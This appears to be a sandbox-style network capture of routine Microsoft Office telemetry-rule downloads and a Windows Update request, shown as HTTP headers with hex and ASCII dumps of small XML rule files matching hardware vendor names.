                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 632
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010002Z-174f7845968swgbqhC1EWRmnb400000016z0000000001k3z
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:02 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    11192.168.2.64971313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:03 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:04 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 79414491-c01e-0014-1360-43a6a3000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010004Z-174f78459684bddphC1EWRbht400000016hg000000001bg2
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    12192.168.2.64971413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:04 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 7b1224ad-601e-0097-014f-44f33a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010004Z-174f78459684bddphC1EWRbht400000016bg00000000npn2
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    13192.168.2.64971513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:04 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6223bc78-401e-0015-38b6-450e8d000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010004Z-1746fd949bdw2rg8hC1EWR11u400000000s000000000bsxe
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    14192.168.2.64971613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:04 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 864f0b94-901e-00a0-42cc-456a6d000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010004Z-1746fd949bdjrnwqhC1EWRpg2800000000g00000000042m0
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                    15192.168.2.6497114.175.87.197443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:04 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DbN5n5YUtSNy7o2&MD=zyr2r5xC HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:05 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                    MS-CorrelationId: be13bb76-8a8d-4949-81f5-9e6ba6d4cf44
                                                                                                                                                                                                                                                                                                    MS-RequestId: 78dc7a45-b7ca-4f2c-aad7-5f07006f0dd0
                                                                                                                                                                                                                                                                                                    MS-CV: vnN/nDGj1EuNrHyL.0
                                                                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:04 GMT
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:05 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:05 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    16192.168.2.64971213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:05 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:07 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 2b878731-501e-008c-34ce-45cd39000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010007Z-1746fd949bdwt8wrhC1EWRu6rg00000000gg00000000c221
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    17192.168.2.64971913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:06 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:06 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: b5189c33-801e-008c-34cb-457130000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010006Z-1746fd949bddgsvjhC1EWRum2c00000000ug0000000048mq
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:06 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    18192.168.2.64972113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:07 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 464
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 431871c3-501e-0047-55cc-45ce6c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010007Z-1746fd949bdkw94lhC1EWRxuz400000000mg00000000bd9c
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
